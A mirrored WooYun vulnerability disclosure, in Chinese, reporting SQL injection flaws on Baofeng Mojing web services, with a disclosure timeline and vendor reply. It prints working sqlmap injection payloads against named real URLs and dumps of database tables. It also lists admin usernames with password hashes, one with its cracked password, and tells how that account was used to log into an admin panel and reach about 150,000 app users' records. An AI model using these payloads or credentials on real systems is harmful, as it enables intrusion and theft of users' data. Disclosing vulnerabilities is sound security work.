1. 首页
  2. 乌云镜像
  3. 暴风魔镜某站SQL注入(涉及魔镜15W用户)
作者:安三

暴风魔镜某站SQL注入(涉及魔镜15W用户)

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-04-23: 细节已通知厂商并且等待厂商处理中
2016-04-25: 厂商已经确认,细节仅向厂商公开
2016-05-05: 细节向核心白帽子及相关领域专家公开
2016-05-15: 细节向普通白帽子公开
2016-05-25: 细节向实习白帽子公开
2016-06-09: 细节向公众公开

简要描述:

恩~~能送眼镜么~~

详细说明:

先从第一个注入说起~

http://pay.mojing.cn:80/api/getvideo.php?version=3.00.1221.2211



注入参数version

code 区域
Parameter: version (GET)

    Type: stacked queries

    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)

    Payload: version=3.00.1221.2211');(SELECT * FROM (SELECT(SLEEP(5)))OIqa)#

---

web application technology: Nginx, PHP 5.4.26

back-end DBMS: MySQL 5.0.11

available databases [2]:

[*] information_schema

[*] mj_resource





code 区域
Database: mj_resource

[18 tables]

+----------------------------------------+

| mjadmin_device_manage                  |

| mjadmin_friend_share_active_rule       |

| mjadmin_friend_share_first_div_docconf |

| mjadmin_homepage                       |

| mjadmin_jump_manage                    |

| mjadmin_resource_bootimage             |

| mjadmin_resource_category              |

| mjadmin_resource_desc                  |

| mjadmin_resource_video                 |

| mjadmin_style_manage                   |

| mjadmin_updatemsg                      |

| permissions                            |

| resources                              |

| roles                                  |

| sessions                               |

| user_autologin                         |

| user_profiles                          |

| users                                  |

+----------------------------------------+





然后注入users

code 区域
Database: mj_resource

Table: users

[3 entries]

+----+------------+---------------------------------------------+

| id | username   | password                                    |

+----+------------+---------------------------------------------+

| 1  | linzanxian | $P$BrFvzTV2JBgPLCNmPJD8jJKQS3K/bO.          |

| 30 | zhaochao   | $P$BLip9mEXmm5xixZQWWhHOxYcdlYUhv/ (123456) |

| 31 | tanliang   | $P$B1saiOyVL.YIiLhhoJNnrTULyITIqY.          |

+----+------------+---------------------------------------------+





拿到一个zhaochao的账户~但是不知道后台 pay和mpay域名的后台都打不开~没办法继续看看~



对所有域名进行目录爆破发现mj域名可以打开admin

就尝试使用zhaochao账户 成功登陆

G5ZOTVBM552VD5`~G3OOUD4.png





然后就想是不是这个后台会存有注入呢~ 尝试搜索

发现http://mj.mojing.cn:80/admin/score/list?status=&uid=1&nickname=1&content=1&begin_score=1&end_score=4&res_type=&res_id=1&res_name=1&begin_create_time=2016-03-30+13%3A56%3A05&end_create_time=2016-04-23+13%3A56%3A07&excel=0

参数 res_id存在问题(其他的没测试)

code 区域
---

Parameter: res_id (GET)

    Type: boolean-based blind

    Title: MySQL >= 5.0 boolean-based blind - Parameter replace

    Payload: status=&uid=1&nickname=1&content=1&begin_score=1&end_score=4&res_type=&res_id=(SELECT (CASE WHEN (1924=1924) THEN 1924 ELSE 1924*(SELECT 1924 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&res_name=1&begin_create_time=2016-03-30 13:56:05&end_create_time=2016-04-23 13:56:07&excel=0



    Type: stacked queries

    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)

    Payload: status=&uid=1&nickname=1&content=1&begin_score=1&end_score=4&res_type=&res_id=1;(SELECT * FROM (SELECT(SLEEP(5)))jGyK)#&res_name=1&begin_create_time=2016-03-30 13:56:05&end_create_time=2016-04-23 13:56:07&excel=0



    Type: AND/OR time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

    Payload: status=&uid=1&nickname=1&content=1&begin_score=1&end_score=4&res_type=&res_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))VzLq)&res_name=1&begin_create_time=2016-03-30 13:56:05&end_create_time=2016-04-23 13:56:07&excel=0

---

web application technology: PHP 5.4.26

back-end DBMS: MySQL 5.0

available databases [3]:

[*] information_schema

[*] modou

[*] mojing





mojing是这个后台的数据库

注入出root用户登录试试

8{3`JLZ{T6HER2YRZ6({7GX.png



GDZZOP)LX8(PCPC63NI~[{8.png





那么modou呢~

code 区域
Database: modou

[34 tables]

+---------------------------------+

| action_yurenjie                 |

| app_check_token_log             |

| bad_word                        |

| feedback                        |

| mcode_link_unique               |

| md_batch                        |

| md_consume                      |

| md_consume_advance              |

| md_friend_share_float_div_limit |

| md_friend_share_limit           |

| md_mcode                        |

| md_mcode_task_log               |

| md_pre_consume                  |

| md_pre_user                     |

| md_recharge                     |

| md_recharge_callback_log        |

| md_res_score                    |

| md_sdk_coupon                   |

| md_sdk_modou                    |

| md_sdk_token                    |

| md_unique_voucher               |

| md_user                         |

| md_user_mp3_combination_code    |

| md_user_res_score               |

| md_user_res_to_app              |

| md_user_upload_mp3              |

| md_verify                       |

| md_voucher                      |

| md_voucher_cost_log             |

| md_xcode                        |

| mj_conference_stat              |

| mj_conference_statlog           |

| mojing_user_2                   |

| user_modou                      |

+---------------------------------+





其中mojing_user_2 引起我注意 我尝试注入几条数据

J84K96O56CP5I]NCM1Q%])G.png





看这应该是魔镜APP的用户吧~





漏洞证明:

大概有15W的用户

SJ]P$Z[TO9PPZFWH`1$%WOG.png



修复方案:

全都是时间盲注~~真不容易!!!!跑了我一个周末的时间!!!!累死了~有礼物嘛~

版权声明:转载请注明来源 mango@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2016-04-25 10:51

厂商回复:

感谢您提交的漏洞,我们会尽快修复。

最新状态:

暂无

本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度已收录『查看详情』

本文链接:暴风魔镜某站SQL注入(涉及魔镜15W用户) - https://www.15qq.cn/wooyun/1008.html

相关文章

发表评论

电子邮件地址不会被公开。 必填项已用*标注

未显示?请点击刷新

允许邮件通知

大家都在搜